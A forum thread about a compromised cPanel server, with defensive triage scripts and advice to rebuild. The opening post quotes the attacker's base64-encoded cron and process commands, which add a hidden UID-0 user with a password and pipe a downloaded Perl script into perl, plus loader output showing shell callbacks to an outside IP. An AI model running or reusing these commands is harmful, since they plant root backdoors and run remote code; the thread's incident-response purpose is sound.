System compromised
Hey all,
At the beginning of this month I had strong evidence that my system was compromised. It was possibly due to a lack of cPanel services certificate renewal (an issue which is now resolved).
There was a new root user created (named 'config') which I found and deleted. Also there were some cron jobs running which I removed. They were trying to create a new user.
Two days after the initial discovery the Apache log folder was deleted, which I just recreated, and everything was back in order (seemingly, at least).
Finally, there was a suspicious (root) process running that I found and deleted. When I stopped the process I received an email (from the process).
Cron job (/etc/cron.d/man-db and /etc/cron.d/0hourly)
*/5 * * * * root echo dXNlcmFkZCAtbyAtdSAwIGZpeCAmJiBlY2hvICI0c0lYUzFQaGc5M10iIHwgcGFzc3dkIGZpeCAtLXN0ZGlu|base64 -d|sh
Process:
root 1769824 0.0 0.0 11304 2500 ? S Apr01 0:00 /usr/sbin/CRON -f
root 1769826 0.0 0.0 2608 528 ? Ss Apr01 0:00 \_ /bin/sh -c echo Y3VybCBodHRwOi8vd2ViLndpbmRvd3N1cGRhdGUuYnV6ei9jb25maWcucGx8cGVybA==|base64 -d|sh
root 1769829 0.0 0.0 2608 528 ? S Apr01 0:00 \_ sh
root 1769831 0.0 0.0 1452348 3416 ? Sl Apr01 1:08 \_ formsec
Mail I received after killing the process:
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 10.1M 0 19952 0 0 24272 0 0:07:18 --:--:-- 0:07:18 24243
4 10.1M 4 446k 0 0 253k 0 0:00:41 0:00:01 0:00:40 253k
52 10.1M 52 5492k 0 0 2088k 0 0:00:04 0:00:02 0:00:02 2088k
100 10.1M 100 10.1M 0 0 3475k 0 0:00:02 0:00:02 --:--:-- 3473k
Making anonymous file...fd 3
Writing ELF binary to memory...done
Here we go...
2024/04/01 18:53:04 Starting shell callbacks to 34.84.42.35:8880
Would anyone suggest any additional steps I should take? Obviously I've blocked the IP that the callbacks went to.
I know that the safest path is to reinstall the OS and cPanel, but it's a procedure I'll take if I see any indication that the server is still compromised.
-
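Added triage example, not code from the thread or from cPanel: a small POSIX shell script that decodes the `echo <base64>|base64 -d|sh` payloads quoted above (the cron one decodes to a `useradd -o -u 0 fix` followed by `passwd fix --stdin`; the process one to a `curl` of a `config.pl` script piped straight into `perl`) and lists every UID-0 account in a passwd file by UID rather than by name, since `useradd -o -u 0` creates a second root under whatever name the attacker picks. The cron and ps lines are the ones from the post; the passwd content is constructed for the example, with the 'config' and 'fix' names taken from the thread.

```shell
#!/bin/sh
# Added example, not from the thread. Decode the base64 payloads posted above and
# hunt for extra UID-0 accounts by UID, not by username.

# Extract the base64 token from a cron entry or ps line of the form
# "... echo <base64>|base64 -d|sh" and print the decoded command.
decode_b64_payload() {
    # $1: the full command line
    token=$(printf '%s\n' "$1" \
        | sed -n 's#.*echo[[:space:]]*\([A-Za-z0-9+/=]*\)[[:space:]]*|[[:space:]]*base64 -d.*#\1#p')
    [ -n "$token" ] || { echo "no base64 payload found" >&2; return 1; }
    printf '%s' "$token" | base64 -d
}

# List accounts with UID 0 from passwd-formatted text on stdin (user:x:uid:...),
# excluding the canonical root entry. Prints one username per line.
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# The two payloads quoted in the thread.
CRON_LINE='*/5 * * * * root echo dXNlcmFkZCAtbyAtdSAwIGZpeCAmJiBlY2hvICI0c0lYUzFQaGc5M10iIHwgcGFzc3dkIGZpeCAtLXN0ZGlu|base64 -d|sh'
PS_LINE='/bin/sh -c echo Y3VybCBodHRwOi8vd2ViLndpbmRvd3N1cGRhdGUuYnV6ei9jb25maWcucGx8cGVybA==|base64 -d|sh'

# Constructed sample passwd: one extra root-equivalent account per name from the thread.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
config:x:0:0::/home/config:/bin/bash
fix:x:0:0::/home/fix:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin'

main() {
    echo "== cron payload ==";    decode_b64_payload "$CRON_LINE"; echo
    echo "== process payload =="; decode_b64_payload "$PS_LINE";   echo
    echo "== extra UID 0 accounts in sample passwd =="
    printf '%s\n' "$SAMPLE_PASSWD" | uid0_accounts
    # On a live host, as root:  uid0_accounts < /etc/passwd
}
main
```

On a real box run `uid0_accounts < /etc/passwd` rather than grepping for the name you expect; the cron job ran every five minutes, so a retry under a different name, or a stray entry in /etc/shadow without a matching passwd line (`awk -F: '{print $1}' /etc/shadow | sort` against the same from /etc/passwd), is worth ruling out before trusting the host at all.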
All I will say is that the email you got with the base64 stuff presumably added a user named "fix" and set a specific password on it. The UID of the new user was 0 (root).
Take that for what it is worth. Sounds like it's time to build a new machine
0 -
/etc/passwd shows no user other than 'root' with root permissions. Also, there is no 'fix' user with any permissions/group whatsoever.
The same goes for /etc/shadow: no encrypted password there for a user with that name.
While the cron was running I kept receiving emails from the system that it was trying (unsuccessfully) to create a new user.
Could it be 'hiding' in any other way?
0 -
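Added example, not from the thread: one way a payload of this kind hides is the pattern the mail in the first post describes ("Making anonymous file...fd 3", "Writing ELF binary to memory"). The loader creates an anonymous in-memory file (memfd_create), writes the downloaded ELF into it and executes from that descriptor, so no binary ever lands on disk and file-based scans find nothing. The kernel still exposes it: `/proc/<pid>/exe` for such a process reads `/memfd:<name> (deleted)`. The walk below checks every PID's exe link for that pattern (and for executables deleted from disk while still running). The fake /proc tree it builds is constructed for the example; the PID 1769831 and the name 'formsec' are taken from the ps output in the post, the other entries are made up.

```shell
#!/bin/sh
# Added example, not from the thread: find processes whose executable exists only in
# memory (memfd_create-backed) or has been unlinked from disk while still running.

# Classify one readlink target of /proc/<pid>/exe.
# Returns 0 (suspicious) for memfd-backed and deleted-on-disk executables.
suspicious_exe_target() {
    case "$1" in
        /memfd:*|*" (deleted)") return 0 ;;
        *) return 1 ;;
    esac
}

# Walk a /proc tree ($1, default /proc) and print "pid target" for each suspicious
# process. Links that cannot be read (kernel threads, other users' processes when
# not root) are skipped silently.
find_memory_resident_procs() {
    proc_root=${1:-/proc}
    for d in "$proc_root"/[0-9]*; do
        target=$(readlink "$d/exe" 2>/dev/null) || continue
        if suspicious_exe_target "$target"; then
            printf '%s %s\n' "${d##*/}" "$target"
        fi
    done
}

# Build a constructed fake /proc so the walk can be exercised offline:
# PID 1 is a normal on-disk binary, 1769831 mimics the memfd-loaded 'formsec'
# from the post, 4242 mimics a binary deleted after launch.
make_fake_proc() {
    root=$(mktemp -d)
    mkdir -p "$root/1" "$root/1769831" "$root/4242"
    ln -s /usr/lib/systemd/systemd "$root/1/exe"
    ln -s "/memfd:formsec (deleted)" "$root/1769831/exe"
    ln -s "/tmp/.x/miner (deleted)" "$root/4242/exe"
    printf '%s\n' "$root"
}

fake=$(make_fake_proc)
find_memory_resident_procs "$fake"
rm -rf "$fake"
# On the live host, as root:  find_memory_resident_procs /proc
```

Pair the walk with `ss -tnp` to see which PID holds the connection to the callback address quoted in the mail; a hit from either is enough to stop hunting for the hiding place and move to the rebuild the later replies recommend.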
There is no way to "fix" a compromised machine - you'll need to either migrate or restore content to a new server.
0 -
Noted! This is going to be my path now. Is migrating the accounts safe? I'm planning to use the WHM account transfer tool. Do you suppose it will also transfer 'bad' files?
0 -
The Transfer Tool is also what we use to migrate compromised systems. If the bad data is inside a user account, that would get migrated, but extra root users and whatnot are not something it would move.
0 -
Thanks to both of you. That was really insightful info! I've got some work to do now!
2 -
In the future, make sure your OS is up to date, as well as cPanel/WHM.
It would not be a bad thing either to use CloudLinux, CSF & Imunify360 as well. Very good software; even though it costs money, it will save you hours of work in the future dealing with security issues. I use them all and I don't regret the money spent on it.
0